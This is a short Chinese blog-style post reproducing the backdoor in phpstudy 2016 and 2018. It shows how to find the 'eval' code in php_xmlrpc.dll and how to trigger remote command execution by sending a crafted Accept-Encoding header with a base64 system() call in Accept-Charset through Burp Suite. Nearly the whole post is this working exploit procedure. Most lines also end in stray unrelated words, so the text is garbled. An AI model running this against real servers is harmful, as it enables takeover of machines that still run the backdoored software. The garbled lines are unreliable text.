前段时间phpstudy被人发现某些版本存在后门,许多人就这样被看成肉鸡长达两年之久php
后门隐藏在程序自带的php的php_xmlrpc.dll模块html
影响的版本:phpstudy2016和2018安全
在H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dllpost
用notepad++打开,ctrl+f搜索eval加密
说明这个版本的phpstudy是由后门的spa
用firefox访问本地ip,用bp抓包,用ctrl+r送到repeaterfirefox
找到accept-encoding,把逗号后面的空格删掉,deflate后面回车换行,加上accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=,而后go3d
(这是system(‘ipconfig’) ;的base64加密)xml
漏洞复现成功htm
加system(‘path’) ;(分号前面有空格)
安全问题不容小觑啊